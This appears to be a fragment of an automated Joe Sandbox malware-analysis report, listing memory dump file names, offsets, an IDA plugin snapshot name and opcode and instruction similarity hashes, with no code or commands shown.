                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 98f7266f18cc69ca89708af9e56575f1404e39f7343eadc6ae3034bacea620ae
                                                                              • Instruction ID: 6e9bffbbe3f7eb4d33850ba03694c70eaf63fc7497810f7904202e50ae69f7aa
                                                                              • Opcode Fuzzy Hash: 98f7266f18cc69ca89708af9e56575f1404e39f7343eadc6ae3034bacea620ae
                                                                              • Instruction Fuzzy Hash: B7C09225B6A000ABAB4CCF58DD51935F3BA9B8BA1CB14B02FC807A3256D134D913860D